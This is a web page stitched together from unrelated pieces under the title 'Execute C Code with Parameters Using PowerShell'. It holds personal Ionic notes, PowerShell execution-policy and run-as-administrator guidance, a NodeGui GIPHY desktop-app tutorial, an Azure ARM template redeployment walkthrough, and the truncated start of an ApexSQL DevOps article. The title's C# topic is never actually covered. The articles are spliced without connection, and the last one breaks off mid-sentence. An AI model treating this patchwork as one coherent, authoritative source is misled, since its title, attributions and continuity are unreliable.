# Execute C Code with Parameters Using PowerShell


Just some Ionic notes

Starting notes on Ionic

I've never used Angular in earnest before. This is also my introduction to a full-fledged framework other than Ruby on Rails, which feels old-school at this point. In addition to the camera component, we can use this hello-world app to learn theming. We can also use the other two tabs to test some of the other components and to work out how a 'page/activity' is built and structured. The camera part shows how to use the native capabilities of a mobile device and other outside 'stuff'.

When we are done, we can package the whole thing as an .apk to test on a device. This will serve as a dry run for building a production app.

Reference documentation: https://ionicframework.com/docs

General init code:

    ionic start myApp tabs

The general form is ionic start <name> <template>, so myApp is the app name and tabs is the starter template.

We got this error:

    ionic : File C:\ionic.ps1 cannot be loaded. The file C:\ionic.ps1 is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at https://go.microsoft.com/fwlink/?LinkID=135170.
    At line:1 char:1
    + ionic start myApp tabs
    + ~~~~~
        + CategoryInfo          : SecurityError: (:) [], PSSecurityException
        + FullyQualifiedErrorId : UnauthorizedAccess

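The fix is to change the PowerShell execution policy. This is a PowerShell setting, not an environment variable. For example:

    Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser

AllSigned only runs scripts signed by a trusted publisher, so it still blocks an unsigned script like ionic.ps1. This one works for Ionic:

    Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

RemoteSigned runs local scripts without a signature. It only requires a signature on scripts downloaded from the internet.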

or

You can use the ExecutionPolicy parameter of pwsh.exe (powershell.exe in Windows PowerShell) to set an execution policy for a new PowerShell session. The policy affects only the current session and its child sessions.

To set the execution policy for a new session, start PowerShell from a command line, such as cmd.exe or an existing PowerShell session. Then use the ExecutionPolicy parameter of pwsh.exe to set the policy.

For example:

    pwsh.exe -ExecutionPolicy AllSigned
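Why did setting the CurrentUser scope fix the Ionic error, and why does pwsh.exe -ExecutionPolicy only affect one session? PowerShell checks several scopes and uses the first one that is not Undefined. The order is MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine, which is the order Get-ExecutionPolicy -List prints them in. The -ExecutionPolicy switch sets the Process scope. If every scope is Undefined, the default is Restricted on Windows clients and RemoteSigned on Windows Server.

The sketch below models that lookup in JavaScript. It is a simplified illustration, not PowerShell's implementation, and the effectivePolicy helper and its input shape are hypothetical.

```javascript
// Simplified model of how PowerShell picks the effective execution policy.
// Scopes are checked in precedence order; the first one that is not
// "Undefined" wins.
const SCOPE_PRECEDENCE = [
  "MachinePolicy", // set by Group Policy for all users
  "UserPolicy",    // set by Group Policy for the current user
  "Process",       // set by pwsh.exe -ExecutionPolicy; lasts for one session
  "CurrentUser",   // set by Set-ExecutionPolicy -Scope CurrentUser
  "LocalMachine",  // set by Set-ExecutionPolicy -Scope LocalMachine
];

// Hypothetical helper: `scopes` maps scope names to policy names.
// Scopes that are missing from the object are treated as "Undefined".
function effectivePolicy(scopes, isWindowsServer = false) {
  for (const scope of SCOPE_PRECEDENCE) {
    const policy = scopes[scope] ?? "Undefined";
    if (policy !== "Undefined") {
      return { scope, policy };
    }
  }
  // Nothing set anywhere: fall back to the platform default.
  return { scope: "Default", policy: isWindowsServer ? "RemoteSigned" : "Restricted" };
}

// Fresh Windows client: nothing configured, so scripts are blocked.
console.log(effectivePolicy({}));
// After Set-ExecutionPolicy RemoteSigned -Scope CurrentUser:
console.log(effectivePolicy({ CurrentUser: "RemoteSigned" }));
// A session started with pwsh.exe -ExecutionPolicy AllSigned overrides CurrentUser:
console.log(effectivePolicy({ Process: "AllSigned", CurrentUser: "RemoteSigned" }));
```

This also explains why a Group Policy setting cannot be overridden from the command line: it sits above Process in the order.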

IONIC HUB

- I set up an Ionic account. The details are saved in LastPass.

FIRST APP: set up and served. This is interesting, though it's literally just boilerplate. More component documentation: https://ionicframework.com/docs/components

>> 10/5/20 See the written sheet for a design sketch of our app. Basically RH type (do design) / code that ronatracker app as a primary test run.

Currently following this tut:

https://ionicframework.com/docs/angular/your-first-app

I'm confused about where to put the class method. The tutorial says: "Next, define a new class method, addNewToGallery, that will contain the core logic to take a device photo and save it to the filesystem. Let’s start by opening the device camera:"

Also: https://www.loom.com/my-videos, and Lobe.ai for a sweet website design.

From what I learned today, an interface is like a metadata location: it describes the shape of a data object. From the way this tutorial is built, I also learned that copy-paste is a crutch and a pain. Read carefully; they specify where to put things.

Holy crap we did it.

>> 11/1/20 Okay, finished the last two pages, which covered some storage stuff. It's a bit over my head, but here is what I take away from it: we learned how to leverage 'outside stuff' like a phone camera. I assume other data types/sources, like a GPS service, will work similarly. At least I think so. Basically, stuff outside of the app?

Lessons

- We learned how to push a collection of pictures to an array, and then how to display that array using the built-in gallery. This was a surface-level intro to the grid system.
- How to start an app.
- Configuring a dev environment.
- How to put in a FAB (floating action button).
- What .ts is (TypeScript, a typed JavaScript); JS types that were new to me, like Blob; a refresher on actually making classes, methods and such.
- An interface holds metadata.
- You can make a functional app very quickly, honestly.
- 'await' is a cool thing, e.g. await this.photoService.loadSaved();
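Two of these lessons can be sketched in plain JavaScript: keeping photos in an array that a gallery grid renders, and awaiting a load of previously saved photos. This is not the Ionic tutorial's code. Only the method name addNewToGallery is borrowed from it. The PhotoGallery and MemoryStorage classes, and the Map standing in for device storage, are hypothetical, so the sketch runs in Node.js without Ionic or Capacitor.

```javascript
// Hypothetical stand-in for device storage: an async key-value store
// backed by a Map, so the sketch runs in plain Node.js.
class MemoryStorage {
  constructor() {
    this.data = new Map();
  }
  async set(key, value) {
    this.data.set(key, value);
  }
  async get(key) {
    return this.data.has(key) ? this.data.get(key) : null;
  }
}

// Hypothetical gallery: photos live in an array that a grid view could render.
class PhotoGallery {
  constructor(storage, key = "photos") {
    this.storage = storage;
    this.key = key;
    this.photos = [];
  }

  // Add a photo to the front so the newest one shows first,
  // then persist the whole array as JSON.
  async addNewToGallery(filepath) {
    this.photos.unshift({ filepath });
    await this.storage.set(this.key, JSON.stringify(this.photos));
  }

  // Restore previously saved photos; callers `await` this before rendering.
  async loadSaved() {
    const saved = await this.storage.get(this.key);
    this.photos = saved ? JSON.parse(saved) : [];
  }
}

async function demo() {
  const storage = new MemoryStorage();
  const gallery = new PhotoGallery(storage);
  await gallery.addNewToGallery("photo-1.jpeg");
  await gallery.addNewToGallery("photo-2.jpeg");

  // A second gallery sharing the same storage simulates an app restart.
  const reopened = new PhotoGallery(storage);
  await reopened.loadSaved();
  console.log(reopened.photos.map((p) => p.filepath));
}

demo().catch(console.error);
```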

>> NEXT: finish the tutorial to a T, then branch off and play around with the leftover tabs. Then deep-dive into the docs, learn the rest of the dev cycle, watch videos, and then start the app project.

Questions:
- More about the constructors.
- What are all of these other files that come in the src folder?
- wtf is this base64 stuff, and do I need it?
- How do I install new components and use them?
- How can I build something for production?


Execute C# Code with Parameters Using PowerShell


The topic for today is a problem I spent close to two hours on last night. Surprisingly, there doesn’t appear to be any easy solution on the web; most sources suggest workarounds I didn’t find acceptable. To save others the time, I thought I’d share what I came up with here. As the title suggests, it’s about running C# code within PowerShell, something I’ve been doing more and more of…


#Add-Type : Cannot add type. The type name#Execute C Code with Parameters Using PowerShell#How to remove a type added by Add-Type#PowerShell Add-Type : Cannot add type. already exist - Stack Overflow#powershell add-type already exists#remove-type powershell


PowerShell Run Bat File As Administrator

To start a script in a new, elevated PowerShell session:

    PS C:\> Start-Process powershell -ArgumentList '-noprofile -file MyScript.ps1' -verb RunAs

To run (and optionally elevate) a PowerShell script from a CMD shell, see the PowerShell.exe page. A set of commands can also be saved in a scriptblock variable and then passed to a new (elevated) PowerShell session: Start-Process -FilePath powershell. How do you run a batch file as Administrator in Windows 10? Here, I am using Windows 10 to show how to automatically run a batch file with Windows admin rights. However, the method works.

There are several ways to run a PowerShell script.

Before running any scripts on a new PowerShell installation, you must first set an appropriate Execution Policy, e.g. Set-ExecutionPolicy RemoteSigned

If the script has been downloaded from the internet and saved as a file then you may also need to right click on the script, select properties, then unblock. If you just copy and paste the text of the script, this is not needed.

A PowerShell script is the equivalent of a Windows CMD or MS-DOS batch file, the file should be saved as plain ASCII text with a .ps1 extension, e.g. MyScript.ps1

Call or Invoke a script to run it

The most common (default) way to run a script is by calling it:

    PS C:\> & 'C:\Batch\My first Script.ps1'

    PS C:\> & cscript /nologo 'C:\Batch\another.vbs'

If the path does not contain any spaces, then you can omit the quotes and the '&' operator:

    PS C:\> C:\Batch\Myscript.ps1

If the script is in the current directory, you can omit the path, but you must explicitly indicate the current directory using .\ (./ will also work):

    PS C:\> .\Myscript.ps1

An important caveat to the above is that the currently running script might not be located in the current directory.

Call one PowerShell script from another script saved in the same directory:

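    #Requires -Version 3.0
    & "$PSScriptRoot\set-consolesize.ps1" -height 25 -width 90

The path uses double quotes so that $PSScriptRoot is expanded; inside single quotes it would be taken literally.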

When you invoke a script using the syntax above, variables and functions defined in the script will disappear when the script ends.[1]

An alternative which allows running a script (or command) on local or remote computers is Invoke-Command

    PS C:\> invoke-command -filepath C:\scripts\test.ps1 -computerName Server64

[1] Unless they are explicitly defined as globals: Function global:name, Filter global:name, or Set-Variable -Scope Global.

Run a PowerShell Script from the GUI or with a shortcut

This can be done by running PowerShell.exe with parameters to launch the desired script.

Run As Administrator (Elevated)

See the PowerShell elevation page for ways of running a script or a PowerShell session 'As admin'

Dot Sourcing

When you dot source a script, all variables and functions defined in the script persist after the script ends.

Run a script by dot-sourcing it:

    PS C:\> . 'C:\Batch\My first Script.ps1'

Dot-sourcing a script in the current directory:


    PS C:\> . .\Myscript.ps1

Run a CMD batch file

Run a batch script from PowerShell:

    PS C:\> ./demo.cmd

Early versions of PowerShell would only run internal CMD commands if the batch file was run by explicitly calling the CMD.exe shell and passing the batch file name.

Run a single CMD internal command

This will run the CMD.exe version of DIR rather than the powershell DIR alias for Get-ChildItem:

    PS C:\> CMD.exe /C dir

Run a VBScript file

Run a VBScript file from PowerShell:

    PS C:\> cscript C:\batch\demo.vbs

The System Path

If you run a script (or even just enter a command) without specifying the fully qualified path name, PowerShell searches for it in this order:

Currently defined aliases

Currently defined functions

Cmdlets

Commands located in the system path.
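This lookup can be modelled as a chain of tables checked one after another. PowerShell's documented precedence (about_Command_Precedence) is aliases, then functions, then cmdlets, then external commands on the path.

The sketch below is a simplified JavaScript illustration, not PowerShell's actual resolver. The resolveCommand helper and the table contents are hypothetical. The example uses where, which is a built-in alias for Where-Object, while where.exe also exists on the system path.

```javascript
// Simplified model of PowerShell's command lookup order when no path is given.
const LOOKUP_ORDER = ["alias", "function", "cmdlet", "path"];

// Hypothetical helper: `tables` maps each kind to a Set of known names.
// PowerShell command names are case-insensitive, so compare in lower case.
function resolveCommand(name, tables) {
  const wanted = name.toLowerCase();
  for (const kind of LOOKUP_ORDER) {
    const names = tables[kind] ?? new Set();
    for (const candidate of names) {
      if (candidate.toLowerCase() === wanted) {
        return kind; // first match wins; later tables are never consulted
      }
    }
  }
  return null; // not found anywhere: PowerShell would report an error
}

const tables = {
  alias: new Set(["where", "dir"]),                 // aliases for Where-Object, Get-ChildItem
  function: new Set(["prompt"]),
  cmdlet: new Set(["Where-Object", "Get-ChildItem"]),
  path: new Set(["where", "cmd"]),                  // where.exe, cmd.exe (extension matched via PATHEXT)
};

console.log(resolveCommand("where", tables));         // the alias shadows where.exe
console.log(resolveCommand("Get-ChildItem", tables));
console.log(resolveCommand("cmd", tables));
```

In practice, typing where.exe with its extension skips the alias and runs the program, much as CMD.exe /C dir above bypasses the dir alias.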


Related PowerShell Cmdlets:

- #requires - Prevent a script from running without a required element.
- Basic PowerShell script Template - HowTo.
- Invoke-Command - Run commands on local and remote computers.
- Invoke-Expression - Run a PowerShell expression.
- Invoke-Item - Invoke an executable or open a file (START).
- The call operator (&) - Execute a command, script or function.
- Set-Variable - Set a variable and its value.
- Functions - Write a named block of code.
- CMD Shell: Run a PowerShell script from the CMD shell.
- VBScript: Run a script from VBScript.

Copyright © 1999-2020 SS64.com Some rights reserved

A coworker of mine was writing a script to simplify some configuration items on some servers, and he ran into a snag. If you’ve worked in IT for at least a day, you’ve seen this message at some point:

Access denied error, seen here in its natural habitat.

This is easily solved with the old right-click -> Run as Administrator routine, but what if you need a script to run a command, or an entire script, as administrator? In this post I go through the three scenarios I’ve come across for running PowerShell commands as an administrator: a single command, an entire .ps1 or batch file, and an entire script from within the script calling it.

Run a single command as administrator

To run a single command as an administrator, we can use the Start-Process cmdlet and pass in our command via the -Command parameter of powershell.exe. The -Command parameter is passed to the EXE through the -ArgumentList parameter of the Start-Process cmdlet. Finally, the command we want to run in our admin session goes inside curly braces, preceded by the invoke operator (&). If that sounds confusing, hopefully this will help:

    Start-Process powershell.exe -Verb RunAs -ArgumentList '-Command & {get-process}'

Run a .ps1 file as an administrator

Running an entire script as an administrator is similar. We just replace the -Command parameter with -File, remove the invoke operator, and define the file path to our script, like so:

    Start-Process powershell.exe -Verb RunAs -ArgumentList '-File D:\Scripts\Get-Process.ps1'


It’s worth noting that these assume that the user running the script is an administrator. If they aren’t, you will still have access denied issues. Hope this helps, and happy scripting!


Build a Native Desktop GIF Searcher App Using NodeGui

NodeGui is an open-source library for building cross-platform, native desktop apps with Node.js. NodeGui apps can run on macOS, Windows, and Linux. The apps built with NodeGui are written using JavaScript, styled with CSS and rendered as native desktop widgets using the Qt framework.

Some of the features of NodeGui are:

native widgets with built-in support for dark mode

low CPU and memory footprint

styling with CSS including complete support for Flexbox layout

complete Node.js API support and access to all Node.js compatible npm modules

excellent debugging support using Chrome's DevTools

first-class TypeScript support

NodeGui is powered by the Qt framework, which makes it CPU and memory efficient compared with other Chromium-based solutions such as Electron. This means that applications written using NodeGui do not open up a browser instance and render the UI in it. Instead, all the widgets are rendered natively.

This tutorial will demonstrate how to install NodeGui and use it to build a meme searcher that lives in the system tray and communicates with the GIPHY API.

The full source code for this tutorial is available on GitHub.

Installation and Basic Setup

For this tutorial it’s assumed that you have Node.js v12 or greater installed. You can confirm that both Node and npm are available by running:

    # This command should print the version of Node.js
    node -v
    # This command should print the version of npm
    npm -v

If you need help with this step, check out our tutorial on installing Node.

Install CMake and Compilation Tools

NodeGui requires CMake and C++ compilation tools for building the native C++ layer of the project. Make sure you install CMake >= 3.1 along with a C++ compiler that supports C++11 and up. The detailed instructions are a bit different depending on your operating system.

macOS

It’s recommended to install CMake using Homebrew. Run the following commands in a terminal after installing Homebrew:

    brew install cmake
    brew install make

You can confirm the installation by running:

    # This command should print the version of CMake which should be higher than 3.1
    cmake --version
    make --version

Lastly, you need GCC/Clang to compile C++ code. Verify that you have GCC installed using this command:

gcc --version

If you don’t have GCC installed, make sure you install the Command Line Tools for Xcode or the Xcode developer tools from Apple's developer page.

Windows

You can install CMake on Windows by downloading the latest release from the CMake download page.

It’s strongly recommended that you use PowerShell as your terminal on Windows.

You can confirm the CMake installation by running:

    # This command should print the version of CMake which should be higher than 3.1
    cmake --version

Lastly, you need a C++ compiler. One possibility would be to install Visual Studio 2017 or higher. It’s recommended you choose the Desktop development with C++ workload during the installation process.

Linux

We’ll focus on Ubuntu 18.04 for the purposes of this tutorial. It’s recommended to install CMake using the package manager. Run the following commands in a terminal:

    sudo apt-get install pkg-config build-essential
    sudo apt-get install cmake make

You can confirm the installation by running:

    # This command should print the version of CMake which should be higher than 3.1
    cmake --version
    make --version

Lastly, you need GCC to compile C++ code. Verify that you have GCC installed using the command:

    # gcc version should be >= v7
    gcc --version

Hello World

In order to get started with our NodeGui meme app, we’ll clone the starter project.

Note: Running this requires Git and npm.

Open a terminal and run:

    git clone https://github.com/nodegui/nodegui-starter memeapp
    cd memeapp
    npm install
    npm start



If everything goes well, you should see a working hello world NodeGui app on the screen.

By default, the nodegui-starter project is a TypeScript project. However, in this tutorial we’ll be writing our application in JavaScript. In order to convert our starter to a JS project, we’ll make the following minor changes:

Delete the index.ts file in the src folder.

Create a new file index.js in the src directory with the following contents:

src/index.js



    const { QMainWindow, QLabel } = require('@nodegui/nodegui');
    const win = new QMainWindow();
    win.setWindowTitle('Meme Search');
    const label = new QLabel();
    label.setText('Hello World');
    win.setCentralWidget(label);
    win.show();
    // Keep a global reference so the window is not garbage-collected
    global.win = win;

As far as development is concerned, a NodeGui application is essentially a Node.js application. All APIs and features found in NodeGui are accessible through the @nodegui/nodegui module, which can be required like any other Node.js module. Additionally, you have access to all Node.js APIs and Node modules. NodeGui uses native components instead of web-based components as building blocks.

In the above example, we’ve imported QMainWindow and QLabel to create a native window that displays the text “Hello World”.

Now run the app again:

npm start

Now that we have our basic setup ready, let's start building our meme searcher 🥳.

Note: If something doesn't work while following this tutorial, check your package.json file to ensure that the starter project has pulled in the most up-to-date version of NodeGui.

Displaying an Animated GIF

Since memes are generally animated GIFs, we’ll start by creating a basic window that displays a GIF image from a URL.

To do this, we’ll make use of QMovie along with QLabel. QMovie is not a widget but a container that can play simple animations. We’ll use it in combination with QLabel.

An example usage of QMovie looks like this:

    const movie = new QMovie();
    movie.setFileName('/absolute/path/to/animated.gif');
    movie.start();
    const animatedLabel = new QLabel();
    animatedLabel.setMovie(movie);

Since we want to load an image from a URL, we can’t use QMovie's setFileName method, which only works with local files. Instead, we’ll download the GIF image as a buffer using axios and pass it to the QMovie method loadFromData.

So let's start with the axios installation:

npm i axios

Now let's create a function that will take a URL as a parameter and will return a configured QMovie instance for the GIF:

    async function getMovie(url) {
      const { data } = await axios.get(url, { responseType: 'arraybuffer' });
      const movie = new QMovie();
      movie.loadFromData(data);
      movie.start();
      return movie;
    }

The getMovie function takes in a URL, tells axios to download the GIF as a buffer, and then uses that buffer to create a QMovie instance.

You can think of QMovie as a class that handles the inner logic of playing the GIF animation frame by frame. QMovie is not a widget, so it can't be shown on the screen as it is. Instead, we’ll use a regular QLabel instance and set QMovie to it.

Since getMovie returns a promise, we need to make some changes to the code. After some minor refactoring, we end up with the following.

src/index.js

    const { QMainWindow, QMovie, QLabel } = require('@nodegui/nodegui');
    const axios = require('axios').default;
    async function getMovie(url) {
      const { data } = await axios.get(url, { responseType: 'arraybuffer' });
      const movie = new QMovie();
      movie.loadFromData(data);
      movie.start();
      return movie;
    }
    const main = async () => {
      const win = new QMainWindow();
      win.setWindowTitle('Meme Search');
      const label = new QLabel();
      const gifMovie = await getMovie(
        'https://upload.wikimedia.org/wikipedia/commons/e/e3/Animhorse.gif'
      );
      label.setMovie(gifMovie);
      win.setCentralWidget(label);
      win.show();
      global.win = win;
    };
    main().catch(console.error);

The main function is our entry point. Here we create a window and a label. We then instantiate a QMovie instance with the help of our getMovie function, and finally set the QMovie to a QLabel.

Run the app with npm start and you should see something like this:

Fetching GIFs from the GIPHY API

Giphy.com has a public API which anyone can use to build great apps that use animated GIFs. In order to use the GIPHY API, you should register at developers.giphy.com and obtain an API key. You can find further instructions here.

We’ll be using the search endpoint feature for implementing our meme search.

Let’s start by writing a searchGifs function that takes a searchTerm parameter as input and requests GIFs from the search endpoint:

    const GIPHY_API_KEY = 'Your API key here';
    async function searchGifs(searchTerm) {
      const url = 'https://api.giphy.com/v1/gifs/search';
      const res = await axios.get(url, {
        params: {
          api_key: GIPHY_API_KEY,
          limit: 25,
          q: searchTerm,
          lang: 'en',
          offset: 0,
          rating: 'pg-13'
        }
      });
      return res.data.data;
    }

The result of the function after execution will look something like this:

    [
      {
        "type": "gif",
        "id": "dzaUX7CAG0Ihi",
        "url": "https://giphy.com/gifs/hello-hi-dzaUX7CAG0Ihi",
        "images": {
          "fixed_width_small": {
            "height": "54",
            "size": "53544",
            "url": "https://media3.giphy.com/media/dzaUX7CAG0Ihi/100w.gif?cid=725ec7e0c00032f700929ce9f09f3f5fe5356af8c874ab12&rid=100w.gif",
            "width": "100"
          },
          "downsized_large": {
            "height": "220",
            "size": "807719",
            "url": "https://media3.giphy.com/media/dzaUX7CAG0Ihi/giphy.gif?cid=725ec7e0c00032f700929ce9f09f3f5fe5356af8c874ab12&rid=giphy.gif",
            "width": "410"
          },
          ...
        },
        "slug": "hello-hi-dzaUX7CAG0Ihi",
        ...
        "import_datetime": "2016-01-07 15:40:35",
        "trending_datetime": "1970-01-01 00:00:00"
      },
      {
        "type": "gif",
        ...
      },
      ...
    ]

The result is essentially an array of objects that contain information about each GIF. We’re particularly interested in returnValue[i].images.fixed_width_small.url for each image, which contains the URL to the GIF.
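Picking those fields out of the response is a plain array transformation. The sketch below assumes the response shape shown above. It pulls the URL and width of each fixed_width_small rendition and skips entries that lack one.

The toGifInfo name is hypothetical. Converting width from a string (as in the sample, "100") to a number is a choice made here, not something the GIPHY API does.

```javascript
// Hypothetical helper: reduce GIPHY search results (res.data.data) to the
// fields the app needs. Entries without a fixed_width_small rendition are skipped.
function toGifInfo(results) {
  return results
    .map((gif) => gif.images && gif.images.fixed_width_small)
    .filter((small) => small && small.url)
    .map((small) => ({
      url: small.url,
      width: Number(small.width), // dimensions arrive as strings, e.g. "100"
    }));
}

// Sample shaped like the response above (query string dropped for readability).
const sample = [
  {
    type: "gif",
    id: "dzaUX7CAG0Ihi",
    images: {
      fixed_width_small: {
        height: "54",
        url: "https://media3.giphy.com/media/dzaUX7CAG0Ihi/100w.gif",
        width: "100",
      },
    },
  },
  { type: "gif", id: "no-small-rendition", images: {} },
];

console.log(toGifInfo(sample));
```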

Showing a List of GIFs Using the API's Response

In order to show a list of GIFs, we’ll create a getGifViews function that will:

create a QWidget container

create a QMovie instance for each GIF

create a QLabel from each QMovie instance

attach each QLabel as a child of the QWidget container

return the QWidget container

The code looks like this:

    async function getGifViews(listOfGifs) {
      const container = new QWidget();
      container.setLayout(new FlexLayout());
      const promises = listOfGifs.map(async gif => {
        const { url, width } = gif.images.fixed_width_small;
        const movie = await getMovie(url);
        const gifView = new QLabel();
        gifView.setMovie(movie);
        gifView.setInlineStyle(`width: ${width}`);
        container.layout.addWidget(gifView);
      });
      await Promise.all(promises);
      container.setInlineStyle(`
        flex-direction: 'row';
        flex-wrap: 'wrap';
        justify-content: 'space-around';
        width: 330px;
        height: 300px;
      `);
      return container;
    }

Let’s break this down a bit.

First, we create our container widget. QWidgets are essentially empty widgets that act as containers. They’re similar to <div> elements in the web world.

Next, in order to assign child widgets to the QWidget, we need to give it a layout. A layout dictates how the child widgets should be arranged inside a parent. Here we choose FlexLayout.

Then, we use our getMovie function to create a QMovie instance for each GIF URL. We assign the QMovie instance to a QLabel (named gifView) and give it some basic styling using the setInlineStyle method. Finally, we add the QLabel widget to the container's layout using the layout.addWidget method.

Since this is all happening asynchronously, we wait for everything to resolve using Promise.all, before setting some container styles and returning the container widget.
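One consequence of this design: each QLabel is added inside its own async callback. The GIFs therefore appear in the order their downloads finish, not the order GIPHY returned them. Promise.all itself resolves to an array in input order. So if you want the API's order, you can download concurrently and then add the widgets in a second pass.

The sketch below shows that pattern in plain JavaScript, with a fake loader in place of getMovie. The loadInOrder and fakeDownload names are hypothetical.

```javascript
// Start every download at once, but return the results in input order.
// Promise.all preserves the order of the promises it is given,
// regardless of which one settles first.
async function loadInOrder(items, load) {
  return Promise.all(items.map((item) => load(item)));
}

// Hypothetical stand-in for getMovie: resolves after `ms` milliseconds
// and records the order in which downloads complete.
const completed = [];
function fakeDownload({ name, ms }) {
  return new Promise((resolve) => {
    setTimeout(() => {
      completed.push(name);
      resolve(`movie for ${name}`);
    }, ms);
  });
}

async function demo() {
  const gifs = [
    { name: "first", ms: 30 },
    { name: "second", ms: 10 },
    { name: "third", ms: 20 },
  ];
  const movies = await loadInOrder(gifs, fakeDownload);
  console.log("finished in:", completed); // completion order depends on timing
  // In the NodeGui app, this second pass is where each QLabel would be
  // created and added to the layout, so the grid follows the API's order.
  for (const movie of movies) {
    console.log("add widget:", movie);
  }
}

demo().catch(console.error);
```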

The post Build a Native Desktop GIF Searcher App Using NodeGui appeared first on SitePoint.

by Atul Ramachandran via SitePoint https://ift.tt/2TBFBEA


Azure offers an overwhelming number of services, which helps projects get built with less friction and at a faster pace. One of the major challenges I have experienced on my current project at work is provisioning new environments for the project workload. Admittedly, life is easy with the Azure Portal, CLI or PowerShell. The challenge comes when you have a big chunk of services to build in each new environment.



Azure has a great solution to this problem: a resource group template gives us a single pane of glass for deploying the whole workload in a single execution. Besides the template files, which contain the JSON configuration for every workload in a resource group, the Azure Portal also provides ready-to-use commands and code to deploy them. Currently the portal provides Azure CLI, PowerShell, C# and Ruby code that can be used to execute the template.

In the quick steps below, I will explain how you can rebuild all the workloads provisioned in one resource group in a new resource group.



Log in to the Azure portal, add a new resource group (“Deploy” is the RG for this demo) and add a couple of workloads. In this sample, I have added an App Service Plan, an App Service, and a Storage account.



We need to download the ARM template for the resource group. Azure provides a hassle-free option to download the ARM template for the entire resource group or for each resource in it. In our scenario, we will download the ARM template for the whole resource group. Navigate to the Export template option in the menu blade for the resource group “Deploy”. Once it loads, a couple of menu options appear, as below. The Template and Parameters options provide the ARM template and the parameter file for all the resources in the resource group.

The next few options are ready-made code for Azure CLI, PowerShell, .NET and Ruby, which can be used as-is to deploy the resources in the ARM template.

Using the Download option on the same screen you can download all the files in a zip format



On extraction of the zip file, you will find a number of files.

Template file

Parameters file

PS deploy file

CLI deploy file

Ruby deploy file

C# Deployment Helper file

I am using VS Code to work with the downloaded files, but you can use any editor you like. Open the downloaded folder and select the template, parameters and deploy.ps1 files. We are using deploy.ps1 because we will deploy the resources with PowerShell, but you can use any of the deploy files listed above.



Add a new resource group where you want to deploy the resources using ARM template. I have created one by the name “ReADeploy”





Select deploy.ps1 and run it with PowerShell from VS Code, which is as simple as pressing F5. You will be asked for the subscription, resource group and deployment name, which are used to connect and deploy the resources to the target resource group.



Next, you will be asked to log in through the Microsoft login pop-up. The best feature of the deploy.ps1 file is that it works like a wizard, so you don’t need to be a full-on developer to deploy resources.





During the deployment, I encountered the error below. This is actually great, as it shows that not everything happens automagically :). By default, the downloaded parameter file has all of its values set to null.

Azure provides a generic template that can be parameterized as required and then deployed, which brings great flexibility. We will update the parameter file. In my case, I have an App Service Plan, an App Service, and a Storage account, so the file needs a name for each.

Note: You might also hit other errors, depending on the services provisioned in the source resource group. A common one involves storage accounts. If the source resource group has a storage account and you deploy the same template to the second resource group, you will get a name error, because storage account names must be unique across Azure. So you need to fix the errors one by one.
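Filling in the null values by hand works for a few resources. The sketch below does the same with a script and also checks the storage account naming rule: 3 to 24 characters, lowercase letters and digits only. The check covers format only, because global uniqueness is still decided by Azure at deployment time.

It assumes a parameters file in the standard ARM shape, with each value under parameters.name.value. The parameter names and the fillParameters and isValidStorageAccountName helpers are hypothetical, since the names in an exported template depend on your resources.

```javascript
// Storage account names must be 3-24 characters long and use only lowercase
// letters and digits. This checks the format only; global uniqueness is
// decided by Azure when the deployment runs.
function isValidStorageAccountName(name) {
  return typeof name === "string" && /^[a-z0-9]{3,24}$/.test(name);
}

// Hypothetical helper: copy a downloaded parameters file, replace each null
// value with the name chosen for the new resource group, and list any
// parameters that are still null.
function fillParameters(parametersFile, values) {
  const filled = JSON.parse(JSON.stringify(parametersFile)); // deep copy
  const missing = [];
  for (const [name, param] of Object.entries(filled.parameters)) {
    if (param.value !== null) continue;
    if (Object.prototype.hasOwnProperty.call(values, name)) {
      param.value = values[name];
    } else {
      missing.push(name);
    }
  }
  return { filled, missing };
}

// Hypothetical parameter names; an exported template names them after your resources.
const downloaded = {
  $schema: "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  contentVersion: "1.0.0.0",
  parameters: {
    serverfarms_demo_plan_name: { value: null },
    sites_demo_app_name: { value: null },
    storageAccounts_demostore_name: { value: null },
  },
};

const { filled, missing } = fillParameters(downloaded, {
  serverfarms_demo_plan_name: "readeploy-plan",
  sites_demo_app_name: "readeploy-app",
  storageAccounts_demostore_name: "readeploystore01",
});

const storageName = filled.parameters.storageAccounts_demostore_name.value;
if (missing.length > 0) console.log("Still null:", missing);
if (!isValidStorageAccountName(storageName)) console.log("Invalid storage name:", storageName);

// Save this output as the new parameters file before re-running deploy.ps1.
console.log(JSON.stringify(filled, null, 2));
```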

Start re-deployment with the fixed ARM template.

Once all the errors are fixed your deployment to a new resource group will be successful

Navigate to the “ReADeploy” resource group created earlier. You will find all the services from the “Deploy” resource group, named as specified in the parameter file.

As you can see from the quick steps above, minimal changes to the downloaded ARM template let us re-create an entire resource group. This works whether the group has a few resources, as in this sample, or hundreds of them.

Happy coding 🙂

ARM + PowerShell – Deploy Azure Workload

#ARM Template Deployment#ARM Templates#Authentication#Automation#Azure ARM Templates#Azure Deployment#Continuous Integration#Microsoft#Powershell#Programming#Resource Group Deployment#technology


Challenge

In the DevOps world, it is common practice to set up database continuous integration solutions for project deliveries, with as many steps as possible included in a single workflow. For SQL Server project types, most database continuous integration and continuous delivery use cases are covered by ApexSQL DevOps toolkit solutions, including both the standalone application and the continuous integration server plugins. Multiple tasks, including building, testing, and deploying SQL database code, can be done through a single pipeline. The question remains whether some non-database tasks can also be performed within the same pipeline, i.e., without additional intervention.

Solution

This article explains how to utilize simple PowerShell projects and integrate them into a pipeline created with the ApexSQL DevOps toolkit database continuous integration steps. This includes an example demonstration for Jenkins, TeamCity, Bamboo, Azure DevOps plugins, and the standalone ApexSQL DevOps toolkit – Web dashboard application.

One of the most basic use cases for database projects is building a database with updated code and installing a client application to test or manipulate that database version. So we will create a PowerShell solution that detects whether the application exists and installs it from a dedicated installation repository: a simple location in the local file system where application installers are kept. Additionally, we will check whether the installer's version is higher than the installed one, so we can skip the installation when the versions match.

PowerShell script

As mentioned, we need a script that installs an application from a local folder. For this example, we want to install the latest version of the ApexSQL Diff application, which will be used to manipulate the schema created by the database continuous integration pipeline.

In the beginning, the path for the desired installer will need to be set with the following command:

$path = "c:\InstallRepo\ApexSQLDiff.exe"

Now, the installer details should be read to check if this application is already installed. These details can be found within the Details tab of the installer Properties window:

First, the correct product name should be read from the file:

    $Product = (get-childitem $Path).VersionInfo.ProductName
    $Product = $Product.Trim()

And then the correct product version:
